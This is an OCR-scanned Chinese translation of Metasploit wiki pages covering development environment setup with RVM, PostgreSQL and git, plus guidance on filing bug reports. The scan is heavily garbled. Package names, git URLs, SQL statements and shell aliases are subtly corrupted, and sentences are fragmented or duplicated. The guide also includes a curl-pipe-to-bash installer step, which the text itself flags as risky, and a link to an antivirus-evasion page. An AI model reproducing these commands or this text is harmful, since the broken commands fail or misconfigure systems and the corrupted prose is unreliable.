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Home 


你 是 希望 安装 一 个 Metasploit 开 发 环境 和 开始 一 个 pull 请 求 么 ， 或 者 为 metasploit 贡献 优 
秀 Exploit 代码 么 ?你 来 对 地 方 了 


你 是 一 个 Metasploit 用 户 就 像 在 黑客 电影 里 一 样 想 要 黑 掉 一 些 东西 ?( 你 是 有 权限 破解 的 ) 最 快 
的 入 门 办 法 是 下 载 metasploit 二 进 制程 序 


这 将 使 你 可 以 访 问 全 部 Metasploit 版 本 :免费 开源 的 Metasploit 框架 ,免费 的 社区 版 本 ,免费 试 
用 的 专业 版 本 


如 果 你 是 kali linux Metasploit 是 已 经 预先 安装 了 的 ,查看 kali linux 文档 如 何 
在 kali linux 开始 使 用 Metasploit 


如 果 你 是 一 名 开发 人 员 , 你 想 要 查看 我 们 的 模块 和 增强 功能 的 接受 指南 ,我 们 是 期 望 看 到 新 
的 metasploit 模块 的 pull 请 求 的 .没有 想到 你 要 怎么 开始 工作 ? 查看 我 们 的 贡献 于 metasploit 
指南 和 建立 安装 metasploit 开 发 环境 


A 
得 到 一 个 开始 
安装 Metasploit 开 发 环境 使 用 Metasploit 使 用 Git 报告 一 个 Bug 


页 献 


贡献 于 metasploit 创建 一 个 loginscans Metasploit 模 块 接受 模块 和 增强 功能 的 指导 常见 的 
Metasploit 模 块 代码 错误 


Metasploit Development Environment 


这 是 一 个 关于 怎么 安装 一 个 有 效 的 Metasploit 开发 环境 的 指南 如 果 你 只 是 想 使 用 合法 , 切 授 
权 的 Metasploit 来 进行 黑客 活动 ,我 们 建议 你 使 用 商业 版 Metasploit 框架 安装 包 或 者 这 个 开 
源 安 装 包 , 这 将 处 理 你 所 有 的 依赖 关系 2 商业 安装 程序 还 包括 升级 到 Metasploit Pro 的 选项 ， 
并 一 周 两 次 更 新 ,而 开放 源码 的 安装 者 将 每 晚 更 新 


如 果 你 是 kali linux metasploit 是 已 经 预先 安装 了 的 ,查看 kali linux 如 何 开始 使 
用 metasploit 并 设置 数据 库 


如 果 你 想 发 展 和 贡献 Metasploit ,阅读 这 本 指南 应 该 让 你 在 所 有 基于 debian 的 系统 使 用 让 
我 们 开始 吧 


假设 


.您 有 一 个 pebian-based 的 Linux 环境 
2. 您 有 一 个 不 是 root 的 用 户 。 在 本 指南 中 , 我 们 使 用 的 是 msfdev ° 
3， 您 有 一 个 GitHub 帐户 


下 载 开发 依赖 包 


sudo apt-get -y install \ 
autoconf \ 
bison \ 
build-essential \ 
curl \ 
git-core \ 
libapri \ 
libaprutili \ 
libcurl4-openssl-dev \ 
libgmp3-dev \ 
libpcap-dev \ 
libpq-dev \ 
libreadline6-dev \ 
libsqlite3-dev \ 
libssl-dev \ 
libsvni \ 
libtool \ 
libxml2 \ 
libxml2-dev \ 
libxslt-dev \ 
libyaml-dev \ 
locate \ 
ncurses-dev \ 
openssl \ 
postgresql \ 
postgresql-contrib \ 
wget \ 
xsel \ 
zlibig \ 
zlibig-dev 


注意 , 还 没 Ruby 不 过 我 们 很 快 就 会 得 到 。 


fork2.clone metasploit 


您 可 以 按照 github 的 fork 指令 操作 , 但 它 基 本 上 只 是 在 Metasploit 框架 的 页 面 的 右上 方 ,点 击 
fork 按钮 

Clone 

如 果 你 有 一 个 fork 在 GitHub, 是 时 候 把 它 拉 到 你 的 本 地 开发 了 。 当 然 您 需要 按照 GitHub 中 


的 clone 指令 进行 操作 ° 


mkdir -p $HOME/git 

cd $HOME/git 

git clone gitQgithub.com:YOUR USERNAME FOR GITHUB/metasploit-framework 
cd metasploit-framework 


设置 git 上 游 
首先 ， 如 果 你 计划 用 最 新 的 Ds se Git 仓 库 来 更 新 你 的 本 地 克隆 库 ， 你 就 会 想 要 


跟踪 它 。 在 您 的 Metasploit-framework 库 中 , 进行 以 下 操作 : 


git remote add upstream git@github.com:rapid7/metasploit-framework.git 
git fetch upstream 
git checkout -b upstream-master --track upstream/master 


现在 , 你 有 一 个 分 支 , 指向 上 游 (这 个 rapid7 fork), 这 是 不 同 于 你 自己 的 fork (原始 的 主 分 支 ， 
指向 origin/master )。 你 可 能 会 发 现 有 上 游 和 master 是 不 同 的 分 支 (特别 是 如 果 你 是 一 个 
Metasploi t RX, 因为 这 使 得 它 不 太 可 能 不 小 心 推 到 rapid7/master ) ^ 

下 载 rvm 


大 多 数 发 行 版 不 会 与 最 新 的 Ruby 一 起 使 用 一 样 的 频率 更 新 。 因 此 , 我 们 将 使 用 RvM ,一 

个 Ruby 版 本 管理 器 。 你 可 以 在 这 里 读 到 指南 : https://rvm.io/, 发 现 它 是 相当 大 。 有 些 人 喜 

XX rbenv 。 你 可 以 使 用 rbenv ,但 你 要 靠 自 己 来 确保 你 有 一 个 正常 的 ruby 版 本 。 大 多 数 的 提交 
使 用 RvM , 所 以 对 于 本 指南 , 我 们 要 坚持 下 去 。 


首先 , 您 需要 RVM 分 发 的 签名 密 铀 : 
curl -SSL https://rvm.io/mpapis.asc | gpg --import - 
接 下 来 , 获取 RVM 


curl -L https://get.rvm.io | bash -s stable 


这 是 直接 的 传递 到 bash, 这 可 能 是 一 个 敏感 的 问题 。 一 种 更 长 、 更 安全 的 方式 : 


curl -o rvm.sh -L https://get.rvm.io 
less rvmsh 
cat rvm.sh | bash -s stable 


完成 后 , 使 得 当前 终端 以 使 用 RVM 版 本 的 ruby: 


source ~/.rvm/scripts/rvm 
cd ~/git/metasploit-framework 
rvm --install $(cat .ruby-version) 


最 后 , 3C bundle, 以 获得 你 需要 的 其 他 gem 库 : 


gem install bundler 


配置 Gnome 终端 使 用 RVM 


Gnome 终端 是 不 聪明 的 , 并 没有 让 你 的 shell 默认 情况 下 是 登录 型 shell, 所 以 RVM 没 有 调整 配 
置 不 能 在 那里 工作 。 导 
航 Edit > Profiles > Highlight Default > Edit > Title and Command > Check [ ] Run command a 


它 看 起 来 像 这 样 ， 取 决 于 你 的 特定 版 本 的 Gnome : 


File Edit View Search Terminal Help 
E 


Default New 


Edit 
Editing Profile "Default" 


一 
General| Title and Command | Colors Background Scrolling | Compatibility 


Title 


Initial title: | Terminal 
When terminal commands set their own titles: | Replace initial title 


Command 


# Run command as a Login shell 
V^ Update Login records when command is launched 


Run a custom command instead of my shell 


When command exits: | Exit the terminal 





最 后 , 请 看 看 您 现在 正在 运行 ruby 版 本 . 


如 果 您 运行 的 ruby 版 本 仍 未 是 ruby 定义 的 版 本 , 您 可 能 需要 重新 启动 终端 。 如 果 您 的 rvm 最 
初 的 安装 没有 类 似 于 以 下 内 容 , 请 确保 您 已 将 rvm 添加 到 您 的 终端 启动 中 : 


echo [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"' >> .bashrc 
看 到 这 ,如 果 没 根据 指南 .用 root 用 户 操 作 的 准备 好 报错 吧 


下 载 Bundled Gem 


Metasploit 有 依赖 (Ruby 库 )。 因 为 您 使 用 的 是 RVM, 所 以 ,您 可 以 在 本 地 安装 它们 , 而 不 用 担心 
与 Debian 封装 的 ruby 冲 突 , 这 要 归功 于 bundled 


cd -/git/metasploit-framework/ 
bundle install 


一 两 分 钟 后 , 你 可 以 开始 使 用 metasploit 了 


./msfconsole 


在 第 一 次 启动 时 顺便 创建 你 的 msf4 目录 。 


msfdevQlys:-/git/metasploit-framework$ ./msfconsole 
[*] Starting the Metasploit Framework console.../ 


QUOGHHHHHHL PLAN 
Pale se ;Q QQ ; VERI GE 
." @@@@@'., '@@ @@@@@', .'@@@@ ". 
' - . (0000000000 eoo 00000 Q; 
` 900000000000 eoo 0000000Q .' 
"-- .000 -.Q Q,'- Abe cci 
ALS) ? @ De: p 
|@@@@ @@@ @ 
' QQQ @@ @@ 7 
* .@@@@ @@ 
", @@ @ ; ———— 
( 3C ) /| / Metasploit! \ 
ug cte NEL 
ot (Creare p 


=[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]] 


+ -- --=[ 1420 exploits - 802 auxiliary - 229 post ] 
+ -- --=[ 358 payloads - 37 encoders - 8 nops ] 
* -- --z[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


msf > ls -/.msf4 
[*] exec: ls ~/.msf4 


history 
local 
logos 

logs 

loot 
modules 
plugins 
msf » exit 


虽然 你 还 没有 设置 数据 库 。 但 这 很 容易 解决 


安装 PostgreSQL 


kali linux 已 经 有 Postgresql, 所 以 我 们 可 以 使 用 它 。 而 用 于 工作 的 Ubuntu 和 其 他 Debian- 
based 发 行 , 假设 他 们 有 一 个 等 价 的 postgresql 包 。 确 保 数 据 库 也 在 系统 启动 时 启动 。 


echo 'YOUR PASSWORD FOR KALI' | sudo -kS update-rc.d postgresql enable && 
echo 'YOUR PASSWORD FOR KALI' | sudo -S service postgresql start && 
cat ««EOF» $HOME/pg-utf8.sql 
update pg database set datallowconn = TRUE where datname = 'templateO'; 
Nc templated 
update pg database set datistemplate = FALSE where datname = 'templatei'; 
drop database template1; 
create database template1 with template = templateO encoding = 'UTF8'; 
update pg database set datistemplate = TRUE where datname = 'template1'; 
Nc template 
update pg database set datallowconn = FALSE where datname = 'template0'; 
\q 
EOF 
sudo -u postgres psql -f $HOME/pg-utf8.sql && 
sudo -u postgres createuser msfdev -dRS && 
sudo -u postgres psql -c \ 

"ALTER USER msfdev with ENCRYPTED PASSWORD 'YOUR_PASSWORD_FOR_PGSQL';" && 
sudo -u postgres createdb --owner msfdev msf_dev_db && 
sudo -u postgres createdb --owner msfdev msf_test_db && 
cat <<EOF> $HOME/.msf4/database.yml 
# Development Database 
development: &pgsql 

adapter: postgresql 

database: msf_dev_db 

username: msfdev 

password: YOUR_PASSWORD_FOR_PGSQL 

host: localhost 

port: 5432 

pool: 5 

timeout: 5 


# Production database -- same as dev 
production: &production 
<<: *pgsql 


# Test database -- not the same, since it gets dropped all the time 
test: 

<<: *pgsql 

database: msf_test_db 
EOF 


在 kali Linux 上 , postgresql (和 任何 其 他 监听 服务 ) 默认 情况 下 是 不 启用 的 。 这 是 一 个 良好 的 安 
全 和 资源 预防 措施 , 但 如 果 你 想 要 使 用 它 , 随时 启动 它 : 


update-rc.d postgresql enable 


接 下 来 , 切换 到 postgres 用 户 执 行 少量 数据 库 维护 以 修复 默认 编码 (在 @ffmike 的 要 点 中 提供 
了 有 用 的 信息 )。 


sudo -sE su postgres 

psql 

update pg database set datallowconn = TRUE where datname = 'templateO'; 
Nc templated 

update pg database set datistemplate = FALSE where datname = 'templatei'; 
drop database template1; 

create database template1 with template = templateO encoding = 'UTF8'; 
update pg database set datistemplate = TRUE where datname = 'template1'; 
Nc templatei 

update pg database set datallowconn = FALSE where datname = 'template0O'; 
Nq 


创造 一 个 数据 库 用 户 msfdev 


E postgresql? 4-4 


createuser msfdev -dPRS 

createdb --owner msfdev msf dev db 
createdb --owner msfdev msf test db 
exit 


$] 3$ database.yml 


# Come up with another great password 
# Create the development database 

# Create the test database 

# Become msfdev again 


现在 你 切换 回 原 本 用 户 , 创 造 文件 SHOME/.msf4/database. ym 


# Development Database 
development: &pgsql 
adapter: postgresql 
database: msf dev db 
username: msfdev 
password: YOUR PASSWORD FOR PGSQL 
host: localhost 
port: 5432 
pool: 5 
timeout: 5 


# Production database -- same as dev 


production: &production 
<<: *pgsql 


4 Test database -- not the same, since it gets dropped all the time 


test: 
<<: *pgsql 


database: msf_test_db 


下 次 启动 ./msfconsole 时 , 将 创建 开发 数据 库 .检查 一 下 


./msfconsole -qx "db status; exit" 


respc 


大 多 数 框架 测试 都 使 用 rspec。 确 保 它 工作 


rake Spec 


您 应 该 看 到 超过 9000 测 试 运行 , 主要 都 是 绿色 点 , 少数 是 黄色 的 , 没有 红色 的 错误 。 


配置 git 


使 用 dev 运 行 


cd $HOME/git/metasploit-framework && 

git remote add upstream git@github.com:rapid7/metasploit-framework.git && 
git fetch upstream && 

git checkout -b upstream-master --track upstream/master && 

ruby tools/dev/add pr fetch.rb && 

ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit && 

ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/post-merge && 

git config --global user.name "YOUR USERNAME FOR REAL LIFE" && 

git config --global user.email "YOUR USERNAME FOR EMAIL" && 

git config --global github.user "YOUR USERNAME FOR GITHUB" 


£ pull & # 
如 果 您 想 轻 松 在 您 的 命令 行 上 访问 上 游 请 求 ,- 您 需要 在 . git/config 中 添加 适当 的 fetch 5178 » 
以 下 操作 很 容易 完成 : 


tools/dev/add pr fetch.rb 


这 将 为 所 有 远程 仓库 添加 适当 的 参考 , 包括 您 的 。 现 在 , 你 可 以 做 一 些 奇 特 的 事情 , 比如 : 


git checkout fixes-to-pr-1234 upstream/pr/1234 
git push origin 


在 github 这 样 做 的 方法 不 太 容 易 描述 这 一 切 都 可 以 让 你 看 看 其 他 的 的 pull 请 求 ,作出 修改 ,并 
发 布 到 自己 的 分 支 。 反 过 来 , 这 将 允许 你 帮助 其 他 人 的 pull 请 求 修正 或 增加 。 
保持 同步 


ded 分 时 间 并 不 想 直接 提交 给 主 分 支 。 WETT 
得 与 上 游 保持 同步 并 且 不 会 丢失 任何 本 地 更 改变 得 很 容 


同步 到 上 游 / 主 分 支 
能 更 容易 了 


git checkout master 
git fetch upstream 
git push origin 


这 也 可 以 保持 pull 请 求 与 主 分 支 同 步 ， 但 除非 你 遇 到 合并 冲突 ， 你 不 应 该 经 常 这 样 做 。 当 你 最 
终 解 决 合并 冲突 时 ， 你 需要 在 推送 重新 同步 的 分 支 时 使 用 --force， 因 为 你 的 提交 历史 将 在 
rebase 之 后 有 所 不 同 。 


对 于 rapid7/master 来 说 ，push 是 从 来 没有 好 的 ， 但 对 于 正在 进行 的 分 支 ， 对 历史 的 一 点 
点 说 明 不 是 违法 的 。 


Msftidy 


为 了 检查 你 正在 编写 的 任何 新 模块 ， 你 需要 一 个 预先 提交 和 一 个 合并 后 的 hook 来 运行 我 们 的 
lint-checker > msftidy.rb ° 所 以 ， 像 这 样 符号 链接 : 


cd $HOME/git/metasploit-framework 
ln -sf tools/dev/pre-commit-hook.rb .git/hooks/pre-commit 
ln -sf tools/dev/pre-commit-hook.rb .git/hooks/post-merge 


你 的 名 字 


最 后 ， 如 果 您 想 要 为 Metasploit 做 出 贡献 ， 您 至 少 需要 配置 您 的 用 户 名 和 电子 邮件 地 址 ， 如 下 
DE: 


à 


git config --global user.name "YOUR USERNAME FOR REAL LIFE" 
git config --global user.email "YOUR USERNAME FOR EMAIL" 
git config --global github.user "YOUR USERNAME FOR GITHUB" 


你 填写 的 邮件 地 址 需要 和 你 的 github 账 号 的 邮件 地 址 相同 


签名 提交 
我 们 喜欢 签名 提交 ， 主 要 是 因为 我 们 害怕 伪造 仿造。 程序 在 这 里 详细 说 明 。 请 注意 ， 名 称 和 


电子 邮件 地 址 必须 完全 匹配 签名 密 钥 上 的 信息 。 鼓励 贡献 者 签署 提交 ， 而 Metasploit 提 交 
要 在 提交 请 求 时 签署 合并 提交 。 


方便 的 别名 
没有 几 个 方便 的 别名 ， 开 发 环境 设置 也 将 是 完整 的 ， 但 它 可 以 使 您 的 生活 更 轻松 


#4 21% 4 msfconsole 


作为 开发 用 户 ， 您 可 能 会 不 小 心 党 试 使 用 已 安装 的 Metasploit msfconsole » 由 于 RVM 怎 么 处 
理 不 同 的 ruby 版 本 和 gemset 各 种 各 样 的 原因 ， 这 种 方式 不 能 工作 。 所 以 ， 创 建 这 个 别名 


echo 'alias msfconsole-"pushd $HOME/git/metasploit-framework && ./msfconsole && popd"' 
>> ~/.bash_aliases 


您 正在 使 用 已 安装 版 本 和 开发 版 本 ， 则 不 同 的 用 户 帐 户 是 最 好 的 选择 。 


提示 当前 的 Ruby/Gemset/Branch 


文 是 超级 方便 的 跟踪 你 现在 在 哪里 的 方法 。 把 它 放 在 ~/ .bash_aliases 中 。 


function git-current-branch { 
git branch 2» /dev/null | sed -e '/^[^*]/d' -e 's/* N(.*N)/(N1) /' 


export PS1="[ruby-\$(~/.rvm/bin/rvm-prompt v p g)]N$(git-current-branch)Nn$PS1" 


Git 别名 


Git 有 自己 的 处 理 别 名 的 方法 - Hie 4€ $HOMEJ gitconfig3£ x repo-nameJ/.git/config 与 常规 
shell 别 名 分 离 。 下面 是 一 些 较 为 便利 的 。 


[alias] 

# An easy, colored oneline log format that shows signed/unsigned status 

nicelog = log --pretty=format:'%Cred%h%Creset -%Creset %s %Cgreen(%cr) %C(bold blue)<% 
aE>%Creset [%G?]' 


# Shorthand commands to always sign (-S) and always edit the commit message. 
m merge -S --no-ff --edit 
c commit -S --edit 


# Shorthand to always blame (praise) without looking at whitespace changes 
b= blame -w 


# Spin up a quick temp branch, because git stash is too spooky. 
temp = !"git branch -D temp; git checkout -b temp" 


# Create a pull request in a web browser from the CLI. Usage: $1 is HISNAME, $2 is HIS 
BRANCH 

# Fixes from @kernelsmith, thanks! 

pr-url =!"xdg-open https://github.com/$(git config github.user)/$(basename $(git rev-p 
arse --show-toplevel))/pull/new/$1:$2...$(git branch-current) #" 


从 这 里 开始 


e https://www.offensive-security.com/metasploit-unleashed/ 
e https://community.rapid7.com/community/metasploit/ 
e https://github.com/rapid7/metasploit-framework/wiki/Evading-Anti-Virus 


数据 库 问 题 
如 果 数 据 库 没有 自动 连接 ， 请 确保 它 正 在 运行 : 


Linux : $ netstat -lnt | grep 7337 其 中 7337 是 您 在 安装 期 间 设 置 的 端口 Windows : 在 任务 
管理 器 中 查找 postgres.exe 进 程 。 


如 果 postgres 没 有 运行 ， 请 尝试 手动 启动 它 : 


Linux : $ sudo /etc/init.d/metasploit start 或 者 如 果 你 没有 选择 作为 服务 安 


X : $ sudo /opt/metasploit*/ctlscript.sh start 


Windows : start -» Metasploit -» Services -» Start Services 


一 旦 postgres 运 行 并 监听 ， 请 回 到 msfconsole : 


msf > db_connect 


使 用 这 个 资源 集合 来 处 理 Metasploit 框 架 的 git 仓 库 。 


e Git 表 

e 参考 网 站 

e 安装 metasploit 开 发 环境 这 将 引导 您 创建 一 个 pull 请 求 
。 开始 一 个 pull 请 求 

e 远程 分 支 裁剪 


分 又 就 是 当 你 把 别人 的 代码 库 快 照 进 你 自己 的 储存 库 ， 应 该 是 在 github.com 上 ， 而 且 这 个 代 

pales 自己 的 分 支 ， 但 你 通常 快照 主 分 支 。 你 一 般 克 隆 你 的 分 支 到 你 自己 的 机 器 ， 然 
后 创建 自己 的 分 支 。 这 是 你 自己 的 分 又 的 旁 枝 。 这 些 快照 ， 即 使 如 果 你 push 到 你 的 github 仓 

库 ， "qose rapidzimetasploibframewore 也 不 是 其 中 的 一 部 分 。 如 果 你 提交 一 个 pull 请 

= 你 的 分 支 (通常 ) 能 push 到 原始 代码 库 的 主 分 支 ( 通 pie DE ALIUM 

变化 或 者 其 他 东西 ， 那 么 你 可 能 成 为 一 个 实验 性 分 支 ， 但 这 不 是 典型 例子 ) 。 你 只 要 分 

当 你 需要 代码 的 机 器 克隆 多 次 ， 而 且 你 可 以 随心 所 谷地 进行 分 支 ， PR oe 


cod 


要 总 是 push， 你 可 以 推迟 ， 也 可 以 不 推迟 ， 但 是 在 做 出 拉 取 请 求 之 前 进行 pull) . 当 你 准备 好 提 
交 一 个 PR 请 求 ,查看 下 面 


github.com/rapid7/metasploit-framework --> fork --> github.com/<...>/metasploit-framew 


ork 
^ 
git clone git://github.com/<...>/metasploit-framew 


~-- accepted <-- pull request V 
^ /home/«...»/repo/metasploit-framework 


| 
github.com/<...>/metasploit -framework/branch_xyz | | | 
| | V V 
| V branch abc 
`=- push <-- branch_xyz 


ork.git 


注意 ”Metasploit Redmine 已 经 关闭 ”官方 wiki 没有 更 新 


Metasploit bug 提交 


任何 开源 软件 产品 越 来 越 受 欢迎 ， 有 一 种 趋势 是 看 到 bug 报 告 量 的 增加 以 及 bug 报 告 质量 
的 相应 降低 。 我 们 不 反对 为 Metasploit 提 交错 误 报 告 - 我 们 需要 错误 报告 来 了 解 什么 是 坏 
的 ， 而 不 是 试图 阻止 bug 的 浪潮 所 以 ， 这 个 页 面 不 是 试图 阻止 错误 的 浪潮 ， 而 是 试图 确 
保 我 们 得 到 的 每 个 错误 报告 都 是 以 最 大 化 解决 问题 的 机 会 来 写 的 。 这 个 页 面 将 试图 确保 
我 们 得 到 的 每 个 错误 报告 都 是 以 最 大 化 实际 得 到 解决 问题 的 机 会 的 目的 写成 的 。 对 于 这 
一 点 metasploit 社 区 是 阅读 了 数 千 份 bug 报 告 。 事 实证 明 ， 编 写 良 好 的 错误 报告 可 以 更 
快 ， 更 轻松 地 修复 这 些 错误 。 监 正 相 当 了 不 起 的 是 ， 快 速 的 关闭 时 间 似 乎 与 错误 报告 质 
量 密切 相关 ， 而 不 是 错误 本 身 的 复杂 性 。 相当 惊人 的 是 ， 快 速 的 bug 关 闭 时 间 似 乎 与 错 
误 报 告 质量 密切 相关 ， 而 不 是 错误 本 身 的 复杂 性 。 有 两 种 情况 你 一 般 不 应 该 打开 一 个 
bug 报 告 ， 那 就 是 当 你 有 一 份 支持 合同 ， 或 者 当 你 发 现 Metasploit 本 身 存 在 一 个 安全 问题 
的 时 候 。 


支持 合同 


如 果 您 有 Metasploit 产 品 的 支持 合同 ， 您 应 该 联系 您 的 Rapid7 支 持 代 表 ， 或 致 信 
support(jrapid7.com » Metasploit 支 持 全 职工 作 的 人 申 的 很 Be ， 它 可 能 当场 有 一 个 修补 程 
序 或 解决 方法 


安全 问题 


如 果 你 发 现 Metasploit 本 身 存 在 安全 问题 ， 那 么 如 果 您 通过 security@metasploit.com 告诉 我 
们 ， 我 们 将 非常 感激 。 毕 竟 ， 我 们 希望 得 到 和 其 他 软件 项 目 一 样 的 对 待 。 并 不 是 说 ， 我 们 想 
要 掩盖 你 的 bug 报 告 .而 是 想 在 有 人 开始 扰乱 我 们 的 无 辜 用 户 之 前 ， 试 着 修复 bug。 我 们 很 乐意 
为 您 提供 信任 ， 让 您 匿名 ， 告 知 您 进展 情况 ， 并 与 您 探讨 相关 问题 。 但 是 如 果 我 们 看 到 有 人 
公开 报告 安全 漏洞 ， 那 么 就 很 难保 持 要 所 有 的 归属 和 直接 沟通 ， 因 为 我 们 要 尽 最 大 努力 尽 可 
能 快 地 修复 漏洞 。 另外 ， 如 果 你 可 以 以 Metasploit 模 块 的 模式 发 送 给 
security@metasploit.com 的 报告 你 的 安全 漏洞 ， 那 么 这 将 是 理想 和 欢 庆 的 。 


这 应 该 包括 你 根本 不 应 该 打开 一 个 bug 报 告 的 情况 ， 所 以 让 我 们 继续 我 们 的 主要 问题 跟踪 系 


2% ° Redmine 


介绍 Redmine 


Metasploit 中 bug 报 告 的 最 终 目 的 地 是 我 们 的 Redmine 问 题 跟 踪 器 。 这 就 是 我 们 想 追 踪 的 所 有 
问题 诞生 ， 变 老 ， 最 终 死 亡 的 地 方 。 为 了 提交 错误 报告 ， 您 俱 须 先 创 建 一 个 帐户 。 这 很 容 
Ao WRB Mo TRH Ss h TEAR MM HARM ARR AEN ES AIRS > 
但 是 我 们 正在 积极 探索 如 何 使 这 种 注册 尽 可 能 人 性 化 和 简单 。 在 谈 到 Metasploit 时 ， 有 人 问 
道 : “有 没有 bug ?。 或 者 是 指 "bug 追 踪 器 "或 “Redmine"， 但 我 们 几乎 总 是 在 谈论 这 个 系统 。 


它们 都 是 bug 


谈 到 对 话 ， 重 要 的 是 要 注意 ， 我 们 倾向 于 将 所 有 问题 称 为 "bug”， 而 不 管 它 是 缺陷 ， 功 能 请 求 
或 支持 请 求 。 这 只 是 少数 音节 和 字符 的 区 别 ， 并 不 意味 着 贬低 这 个 问题 的 内 容 


github issues 

我 们 在 GitHub 仓 库 中 局 用 了 一 个 问题 跟踪 器 ， 但 是 ， 正 如 上 面 所 说 的 ， 如 果 它 们 要 被 跟踪 的 
话 ，BUG 应 该 会 在 Redmine 上 。 我 们 有 一 个 幻想 关闭 Redmine 一 段 时 间 ， 完 全 切换 到 GitHub 
的 issues ， 但 Redmine 仍 然 是 对 于 放弃 来 说 是 有 用 的 。 因 此 ， 在 此 期 间 ， 没 有 人 会 阻止 您 提 
交 GitHub 问 题 。 许 多 GitHub 项 目 都 有 一 个 “问题 ?按钮 ， 我 们 宁愿 不 让 人 们 感到 惊讶 ， 并 通过 
Wiki 学 会 出 如 何 报告 错误 。 如 果 你 正在 阅读 这 个 ， 现 在 你 已 经 明白 了 ， 所 以 应 该 避免 这 


个 issues 标签 。 


电子 邮件 


我 们 维护 几 个 邮件 列表 - Metasploit 框 架 和 Metasploit-Hackers 列 表 。 有 时 候 人 们 会 遇 到 问 
题 ， 他 们 会 在 那里 提 到 他 们 。 有 时 ， 有 人 会 根据 这 些 列表 上 的 流量 汇总 错误 报告 ， 但 有 时 候 
没有 人 会 这 样 做 。 重 点 是 ， 如 果 您 不 确定 是 否 有 错误 或 仅仅 是 使 用 问题 ， 请 以 一 封 邮 件 到 框 
架 的 邮件 列表 开始 。 如 果 你 确定 你 有 一 个 bug， 那 么 最 好 从 一 个 普通 的 错误 报告 和 开始， 然后 在 
其 中 一 个 邮件 列表 中 提 到 它 。 


Rapid7 社 区 

Rapid7 在 ( 它 是 等 待 的 )community.rapid7.com 上 运行 Metasploit 用 户 社区 。 就 像 电子 邮件 一 
样 ， 这 里 主要 是 讨论 和 帮助 使 用 Metasploit 的 场所 ， 而 不 是 那么 多 的 bug 报 告 。 

AT] 

在 bug 报 告 的 机 制 上 ， 足 够 的 谈论 

避免 重复 

你 可 能 不 是 第 一 个 注意 到 你 遇 到 的 问题 的 人 ， 所 以 这 里 有 一 些 策略 来 确保 以 前 报告 的 错误 被 
关注 。 

如 果 您 遇 到 特定 模块 的 问题 ， 可 以 尝试 搜索 该 模块 的 名 称 来 查看 是 否 已 经 有 任何 已 报告 的 内 
容 。 如 果 你 的 bug 有 一 个 特定 的 错误 信息 ， 那 就 去 搜索 那个 。 


另 一 个 策略 是 简单 地 浏览 最 近 的 错误 ， 特 别 是 如 果 你 怀疑 这 个 过 程 中 有 一 个 新 的 错误 ， 因 为 
你 以 前 肯定 会 使 用 过 它 。 
如 果 您 碰巧 发 现 了 您 遇 到 的 错误 ， 那 么 使 用 任何 新 信息 更 新 报告 对 于 解决 问题 都 是 非常 有 帮 


助 的 。 你 也 可 以 找到 解决 的 错误 ， 描 述 你 的 问题 ， 这 表明 一 个 回归 (Zbug*€ 312] A) -修复 
这 些 问题 通常 是 快速 的 ， 所 以 注意 到 可 能 的 问题 回归 是 相当 有 用 的 。 


最 后 ， 你 可 能 会 发 现 一 个 被 拒绝 或 关闭 的 错误 。 在 这 些 情况 下 ， 这 个 问题 通常 是 Metasploit 外 
部 的 东西 - 用 户 错误 ， 配 置 怪异 ， 已 知 的 不 兼容 性 等 等 。 如 果 您 认为 原来 决定 错误 ， 请 打开 一 
个 新 的 bug 并 指出 您 认为 的 问题 是 什么 。 上 毕竟 ， 如 果 人 们 继续 碰 到 同一 个 非 bug， 那 么 这 可 能 
至 少 是 一 个 文档 bug， 也 可 能 是 站 的 。 


描述 你 的 错 1 
让 你 的 bug 可 搜索 


由 于 我 们 在 提交 之 前 谈论 了 寻找 已 有 bug 报 告 的 重要 性 ， 所 以 确保 你 的 bug 是 可 以 找到 的 。 在 
标题 中 使 用 特定 的 模块 名 称 和 错误 消息 ， 并 尽 可 能 多 地 包含 报告 中 的 错误 。"The Windows 
login aux mod is broken” 是 一 个 可 怕 的 标题 ， 而 “NoMethodError raised on smb login 
module” 好 得 多 。 


大 多 数 情况 下 ， 你 遇 到 的 错误 没有 很 好 ， 清 楚 的 错误 信息 。 在 这 些 情况 下 ， 试 着 确定 标题 中 
的 内 容 。 例 如 ， 请 查看 错误 #7215 这 是 一 个 非常 典型 的 投诉 ， 一 些 模块 未 能 打开 一 个 shell ， 
但 注意 到 ， 虽 然 模块 名 称 不 在 标题 中 ， 但 是 在 开始 描述 中 。 此 外 ， 这 个 错误 有 很 多 日 志和 屏 
幕 截图 。 


日 志和 屏幕 截图 


查看 Bug 并 6905。 如 果 我 们 所 有 的 错误 报告 都 是 这 样 的 话 ， 我 会 很 高 兴 的 。 它 非常 简短 ， 并 
具有 一 切 基础 - 一 个 简短 但 描述 性 的 标题 ， 错 误 的 完整 回溯 ， 完 整 的 历史 记录 以 及 版 本 信息 。 
这 个 bug 非 常 适合 搜索 ， 也 容易 重 现 。 

如 果 您 正在 实验 室 或 虚拟 环境 中 测试 模块 ， 我 们 硕 望 获得 尽 可 能 多 的 目标 数据 。 这 意味 着 包 
括 精确 到 补丁 级 别 的 目标 的 准确 版 本 ， 如 果 可 以 的 话 ， 捕 获 它们 的 pcaps， 以 及 Framework 内 
部 或 外 部 的 任何 类 型 的 日 志 记 录 。 

通常 情况 下 ， 我 们 会 要 求 framework. log- 通 常 保存 在 那里 sHOME/ .msf4/framework. log ? 


另 一 方面 ， 如 果 您 在 一 个 协议 内 时 遇 到 问题 ， 我 们 知道 您 不 能 在 您 的 错误 报告 中 包 
户 数据 。 在 这 种 情况 下 ， 我 们 仍然 会 在 日 志 中 发 现 错误 ， 但 是 您 需要 首先 对 它们 进 
如 果 您 需要 拒绝 ， 我 们 不 会 感觉 受到 伤害 。 这 就 是 对 一 个 公司 渗透 测试 的 业务 


HR 
行 清理 ， 


提 到 你 的 环境 


这 可 能 是 你 所 描述 的 错误 只 会 在 你 的 环境 中 出 现 。 如 果 你 不 在 正常 的 Metasploit 开 发 环境 或 者 
Metasploit 安 装 中 ， 你 要 在 你 的 bug 报 告 中 特别 提 到 这 一 点 。 命 令 的 输出 ruby -vfe uname - 
a (或 winver) 通常 非常 有 帮助 。 


包括 重 现 的 步骤 


至 少 ， 你 的 状态 采取 的 步 骤 可 能 在 这 里 找到 $HOME/.msf4/history, ， 所 以 您 可 以 从 那里 剪 切 和 
